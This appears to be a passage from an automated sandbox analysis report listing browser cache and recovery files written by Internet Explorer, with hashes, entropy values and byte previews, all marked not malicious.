SHA-512:	A1E75F2562C5BA53185C20B72B40107682B4533640C963898FB407415C74F9B3C71652D8F9154A78A3907043CDE656CDCB06AAC5011AE0DAB0FC7841C4864805
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1D846800-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5647486840534692
Encrypted:	false
SSDEEP:	48:IwYGcprFjGwpaoG4pQMGrapbSLGQpKtG7HpR0TGIpG:rsZF9Q46KBSlAMTQA
MD5:	B04D81ACCE57EBE6888B1BF25E42ED71
SHA1:	9B6346E18412C1E3CB69D6BF2DE36A5BEE6050D2
SHA-256:	976230C00F726FFC54498CDEFAA70103F2FC88E2047EEBE5676005EB27FB93BC
SHA-512:	9BD6494B6F38E49EDE5EED35781E7029A03B96362BF1E86E6804316D2CFC76559DFD6F4BFD1C55CEF653C3708BE55926FE7489BDBE3C31CE682C43F969D5B797
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D216EB05-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	198778
Entropy (8bit):	3.5805909496048445
Encrypted:	false
SSDEEP:	3072:6Z/2Bfcdmu5kgTzGtUZ/2Bfc+mu5kgTzGtj:zzG
MD5:	7DDB6F7837C3B0DB79B4D1E07383EF5A
SHA1:	D54E65B708A77C73C609D79AB08E577F0F5B41E4
SHA-256:	CE8A98093D76F2566B8EFBA092D035DC890281B8D3E4BDEA3CDF1ECB913E5087
SHA-512:	AC85EF4C0648D91A9B169EB3BD5D6AE0C61C4A84C214F4AA0AB335BEFD5ED5E3954EDA55D468EA90944062C227B05BA3062CADC6AF09407F51B091EB08D82032
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E0902923-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	1.8518509305578397
Encrypted:	false
SSDEEP:	96:rdZ69QB6rBSAjx2lWqM2y6b57fBDR6b57fBigA:rdZmQB6rkAjx2lWqM2y65BDR65BTA
MD5:	7BF13B5E365A501E5F328CF5263FC363
SHA1:	DAC0DD8DF53210E742487982ACF9A67B034D777E
SHA-256:	141B0315EC78295889203F241439A40593A9D697AF87B42BAB4C836C8625A31F
SHA-512:	262CE630089D589A37162A964680704D4D58F4310DD39AA7F19F42B918050730065DFC8DBBE7D06FC84731F09A0D9C78836453EE0442E201B18A7BCB0128ED5D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E7BEE5ED-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.8446360821272143
Encrypted:	false
SSDEEP:	96:rPZM9QM6eBSnjOO21WcM86JxoExJxoRaA:rPZgQM6eknjx21WcM86JvxJDA
MD5:	1A5633DCCAA213EADD04FFF5097365D4
SHA1:	179D7062089C86C8856F8784BDF2DFAE03918553
SHA-256:	4EB1291469B83208D7D83E4A1CF79BC9322DA3D39F33373A66852CE06BEB4EDA
SHA-512:	2FE6133DEE1941B4EDCC4952F96BE441724A6ADC837EA64E439A104EF39AF310B8FD94BB7F95B1DD642259CB0F487BDB307DC60331B5AC4180015E8D06B291E5
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E7BEE5EF-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27360
Entropy (8bit):	1.8415972707142403
Encrypted:	false
SSDEEP:	192:r0ZjQr6lkZjZ2VW/MioqtlleKT0RtlleKTAgA:rksuuVos0ivNeKTkNeKTI
MD5:	9B1D6A3DA881236EDB2F9F63CE36ECA3
SHA1:	B133028290D2CBCDFB98E842DA7FA6696AA3013F
SHA-256:	4CBAF37BE13471733E3E5D78586A221FD7CF5AAD13DE178CD7EDD9A00766814A
SHA-512:	22EB232FBC645AA5E16E5EDD4DC2A4B1B96DB28B89FE14AF9464EC600BA981B9B10731662D8DD361F694719B63987B9BE1FDF2F2F5EB4A010F8B50979A6EFABC
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EEC98C0D-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29952
Entropy (8bit):	1.8569195919903596
Encrypted:	false
SSDEEP:	192:rvZ0Qa6AkQj5219WeM6qqDhZvjDh3SFVc2:rR9FNSI+3pKc/
MD5:	1F9CB1B907D2BE8A376DB916F580E480
SHA1:	B2D67B721F39FDF9FCDF6F65B638A29EF98D4783
SHA-256:	F4681E35F1637DF3999A5FCC88548F223E79E6A47040FB7EC684954B2323DB35
SHA-512:	F6F0B8A20EC68E2955FBEC11675A651169FB74BA80839B387346EA7AD825048BB540B2C42067F3EAB46B6C6F60D852966360B4160AF8FFC8ABAC08D0A6FA1288
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F52F6DD0-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27396
Entropy (8bit):	1.850103058255522
Encrypted:	false
SSDEEP:	96:rKZz9QN6zBSLjt2ZWPMTmCpaivsUCRCpaivsU5i5A:rKZBQN6zkLjt2ZWPMTm+aE6R+aEhgA
MD5:	72B8C78981170A19A78E54A9466B8898
SHA1:	53568231E91B40B4A03E657D426FDFD668EC9A88
SHA-256:	F8344409E5678BBC8D84DE4B0A6DC3C98843BBAFB370DFA332EB4DD6E39DFBA7
SHA-512:	B7B325914A13635702587E0766D531A0FAA3B7E21FCBE819D2388E3CF00FCE8216363C73D5A582643034724FB07E909135B25CC109C512A79CF122E9C84C532E
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F52F6DD2-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27356
Entropy (8bit):	1.8398469447711234
Encrypted:	false
SSDEEP:	96:rtZm9Qi6cBSMjp2FWpfM+6uMnECcN2RMnECcNEECyA:rtZ6Qi6ckMjp2FWNMRu/JN2R/JN/JA
MD5:	CA8066B2F5909D5A38831BA1F9F3D817
SHA1:	B19A2B94D8F4DCA64FC6AAA854FF77A9E9F6DEAD
SHA-256:	01F135A889717DE936556378B5EAD5C365B48C5FDF5A36BD7840035D3E19BF61
SHA-512:	12E90852F6FD4C7F0E7669CB1A12271134C96C6501B97A133CC394184D659476DF57FFBCB794B46763792C4D500171C4568BB79FA14FD43D44387E2E1EC91488
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F52F6DD4-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.843188759183616
Encrypted:	false
SSDEEP:	96:rlZC9QW6EBSaj12hWnMr+NE4/SxNE4/j0A:rlZOQW6Ekaj12hWnMr+sx6A
MD5:	AB4E13E72259C103ACA5E34EA1324448
SHA1:	B9F7F24CE6EF639D7E391470FCB8CCDBB1EDCD75
SHA-256:	14789B61400E155655C923C8293CD077F6DC014957D5F9DD8EFEA085408E7A88
SHA-512:	13995FAD2227F67B9486E5648527D568735F553C8145BBD29E13364D969BEE17A067C12DA9B6B19C2ADA7782FAFD615424124BE1757BB1BA761D05AE11C88055
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FD5CACD5-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27928
Entropy (8bit):	1.8444736273919806
Encrypted:	false
SSDEEP:	192:riZtQZ6LkZjpn2p3Wp9MpBSjQjypRjQjy8r:rey0QVUMAKP3PM
MD5:	D80709422116B7C3DDF3B7A2748109C3
SHA1:	79FB1433777E7A146293E4AB4F97D89B01A3C462
SHA-256:	96948C990A19112E665E3BF819EF323A37865A6AF4EAD72E718E93EA1C983C64
SHA-512:	15780903ACE3EC310F288875CD42EED9982F029D3E92ED0663CD7CA35D250369956CBD156102A659CE2875913119499CA981EED24F1679F03688B5E1CE7EE928
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FD5CACD7-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27428
Entropy (8bit):	1.86080732503988
Encrypted:	false
SSDEEP:	96:rBZG9QC6oBSHjd2VWjMHGpSEj+FtbRpSEj+Ftq+A:rBZaQC6okHjd2VWjMHGpF+zRpF+pA
MD5:	C290D1C67E2CD4FD5C05BC7DFCF80AB0
SHA1:	929CE1DCB05581783461E39C50239D5E5E3E851C
SHA-256:	F20A12659E52DD13F589525117ACB31A648FEC9A09064DD660A8651D2EB6C30A
SHA-512:	BA42F2B098FC49E9C86A279015E6B4707CEAFF0E2AFB96A47484C37EAB426755184BACCB1C25E260B72FE66B687483D206FEFDBAE559571AD0D6CD216DC7147F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FD5CACD9-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	1.8473883687210626
Encrypted:	false
SSDEEP:	192:r1ZiQT61kojx2dWkMwyEN6Lo2REN6Lov6LTA:r7P2+qg0RvU6kCU6kv6o
MD5:	69603F0A25F3C9AC937C203741E27B90
SHA1:	494189DBD031A07D37CA8F6A46444BF732F07DE0
SHA-256:	C1E24BBFBE938CE7271A89D3910F1EDD23614499E77FAB5CE7AE0508A144BC42
SHA-512:	D8AADC019EFDA874921CD17D0A44DE958D282812F36B715BBCEE26FE8D54C9918F0800A06C2D6C91FD015C57FFD12A52E6C3B517A8A09F0C7A1BE917E213AF6E
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FD5CACDB-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.841935773082147
Encrypted:	false
SSDEEP:	192:r4ZfQz6Vk2jww2yaWrMM+Dl+J2xDl+Jnl+JnA:r4YWewwHyZYXQJqQJMJA
MD5:	72076246D2F1F66C2D7EB287E7F0AA28
SHA1:	DCFD23A13A2B4A472113E1A76224E370BD809070
SHA-256:	60D4976765124BC2965223F8A5C3F00C48AB31058B4A57BBA5E2AD6C433947BC
SHA-512:	7E1A6EC6E191141FC1977DDDDCBF301F769271723FCC7381C0CA7DC68F632FC441DF160435E11E49255765FFF1FC31305D5F6731781E7CA92B31558F5FE9530D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	5676
Entropy (8bit):	4.140966519024288
Encrypted:	false
SSDEEP:	96:+l0aWBj4m5zDlvV2rkG4zuAZMXJFG62q7mQT:+lCBjx5zZ0IG46AaXJFG6v7me
MD5:	CAB1D8778D4BE2F432079B571C88D5AB
SHA1:	68C3946D265A72F1CA470A3A60C15EAC679851E2
SHA-256:	DF7DFFFF2D9678BE316069F2344E06CB061BC7768190A9A575AB3DEB26B0DD27
SHA-512:	DBB7A4AA45663D80C7ECBF3CAB4AAEDBF6D0DED8B32D9C1D5FEF07FAAB3F03073AFE3F706FF1C962DC779FB0E2AD7BDFA0BF90D8A5A3942CECB409F1BA92A002
Malicious:	false
Preview:	).h.t.t.p.:././.t.a.y.b.h.c.t.d.y.e.h.f.h.g.t.h.p.2...x.y.z./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	downloaded
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\55a804ab-e5c6-4b97-9319-86263d365d28[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2939
Entropy (8bit):	4.794189660497687
Encrypted:	false
SSDEEP:	48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAcHHPk5JKIcFerZjSaSZjfumjVT4:OymDwb40zrvdip5GHZa6AymshjUjVjx4
MD5:	B2B036D0AFB84E48CDB782A34C34B9D5
SHA1:	DFC7C8BA62D71767F2A60AED568D915D1C9F82D6
SHA-256:	DC51F0A9F93038659B0DB1B69B69FCFB00FB5911805F8B1E40591F9867FD566F
SHA-512:	C2AAAF7BC1DF73018D92ABD994AF3C0041DCCE883C10F4F4E17685CD349B3AF320BBA29718F98CFF6CC24BE4BDD5360E1D3327AFFBF0C87622AE7CBAB677CF22
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.json
Preview:	{"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AALBT5R[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	38082
Entropy (8bit):	7.95283561615866
Encrypted:	false
SSDEEP:	768:Iskhx3xgeUanE7yRi30penhZzJqPTbBCuLOxRNUbmX1DM0o:Ibhtxg/oiEEQT1CuaxRbBM0o
MD5:	B745F3E46BDA9E883A20D3D734A5F5A7
SHA1:	560751C163E1D89FAE870F9B5F417C1176ACEA17
SHA-256:	9E9C6003C9ED82BE8C45B120D61C4024C460A302CA87891B6B745708B0418BAC
SHA-512:	62F7E13DDE88C8358761CAA605B86A78FDE1AA0DB78275264B6A101F431B68E53E3D097BD8FCE19094ECD3B655CFA9C993C373F0517DEA91905FDFA61EB3822E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AALBT5R.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=782&y=258
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..,...>-Rt.q.@h`q.-?..R..B...>..3.@.@..p.....h...C..)4...>t..o_.\.{.........}Pw=........"..@.(..Z....2...}m.P94......u.Q.........c..?...<..E.~t.6>.u.........^.&.3..E.......V/..A._Yy.h..X...~{.h[....'S.....>k....t..wI..v.tu..p>,.......Z..............L...h..w..#.....A...P.....O.)h....l..Dv......*K@..ISk..`U..).sB.........S`Ol?.....K..P.kO.......`YU-..O.?. EMk.E..s....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AALOVXU[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	7378
Entropy (8bit):	7.846965688561589
Encrypted:	false
SSDEEP:	96:QfQExpVNZQbqzpMz0y+csLY0v7CGCjYAcnxqKKcm0yMgU8ks1KMFsO84TrGo9zpx:QoCNbzbLY0TChnUxhKcKBUcKMQuvVl
MD5:	FC8F7E7E7784B59A80BD01F0AC897B56
SHA1:	33281FE7BA04CAD9412BC2392C308F7595C0AC84
SHA-256:	51C3E79651CDC29AC84F851729B1060A2478729955DDAD6E13C5E261D10F17C5
SHA-512:	1EC362074397D2E2D3C5618AE77C785D28628DEFD68EA613D9490B009324EF7B0E456932DB73B0FC872EAAFD8AE9FE997062E39D7175D6A3602BDE81EC94D0D8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AALOVXU.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=500&y=281
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....P.@....P.@.@....P.@....P...3..@.".g...i\v....."Y.e..<..E..'...Q...0s......}...77Y.).PpdoA.Oj.I.Cq;...8..(.....TU......(...P.@....P...@....P.@....P....@.6.cI.7..S.....J.V.2.Id....?<...iH.4..1.a......^[...........!....$C...T..... .Ey.Y%H.!....n}};.4eM..c.$..T.-...P0..P.@....P...@....P.@....P..B..G&...x..H.....}.nRF......%Fq.~.......w.X...."..V..~...?....}"... ..7....%...Jq

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AALPpDM[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	10987
Entropy (8bit):	7.9393871443314685
Encrypted:	false
SSDEEP:	192:QoeoTS9m60zck21CjYGVoa7NZbPw0OJNJIjFVFrkL5o7M30jm6q29ZLi5BzlTZ:b3CQcX8oa7N1CNJIRnkL5G86qEZLCVZ
MD5:	2FEDF6404B89D2CC6684081C9B8A3E4C
SHA1:	914E9344AEAF0CE525241085147921E8BBF75AD8
SHA-256:	658DC6CF1540C1C91FF8789DB9548AC48698CE41F17AF10DB5856FF1A03CF82D
SHA-512:	C1F4AA99C3BE3DC019815114A9998CE2FFD0607D877D290D7E81D1BE2266A152E392A3C9A3B365B71C99DA3197641A7A5D3ABCD8C3F729705E9877D4850C22B0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AALPpDM.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=302&y=118
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..KQ..j.}.$.R.4%Xc.&..O..H....^.p.:.@D...A..x...>.(..WRE......0.&M.%BY.`...........i...s.@..6...9.1.9...>V1..,d.dm...;H+H...H .@5I.r...b...(...r@..!..1..2E.H..R.,C.E.e...@a.. .\&h.......%qcF.rFh.C.a.0..R..X..=(.X6..1.w..(bF.....0.M..h.r)...J..}.g...8..H...M..8(r(.....@1.,CqE..-.qH@B..n>RH.VW.f.z...\|..%vU..9.H.2....6B.....w"a.qAB\9..8..#8.......D..+.I...v..XT...dvl\|..&

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AALPpJm[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	14603
Entropy (8bit):	7.940939800659526
Encrypted:	false
SSDEEP:	192:Q28ZcPjMMzm52HFKfNUgvdrpNC75MyL5bwalGRzgdvLehS/AIlVvfwSn4PKrWsFK:N8MK/BVr2loavLB/AIlJIKrDWQK
MD5:	D1B0C4A06AA83F4E94C9E1F69B9AB096
SHA1:	BEC26079B71048380AD99ED71926B6D5B41C5F37
SHA-256:	4A87ABF57997164161F697AA8A3807E0F4DBB19DE1147174E3F454B770B55EF7
SHA-512:	63AFF482028A48C98F5BED5702D5B19CEFAE1E08CC8E1F369F2E481B2416E7A8E93A7BAB87E9B727781FD51E398AFA27C2AF8297C2E25A53C6FC93CE6347F300
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AALPpJm.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=222&y=180
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..U)..).@...$E.,...$....D..c.R(.Ef..R.uK@(.6..V.iX..R.....}......S.(..h...x...4.1...Q,\.!.!...P...-....N.....$....2......N..Zv....p.J.q.".!6l.).j.f.....8..H.P...d...H.)1...(z....R.x.,....xZ...`.(..\......+..Q`.......`..,!..v(..h..*...!.C.U5.b.H...,.l8...XU..L......."2...d.v.....4X.#^i.f...["..8.29.+....L..h&..P!.T.B..PT...T...&..R..R...)..i.......@74...@#.)....`&U...r(..z.1.1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AALPq41[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
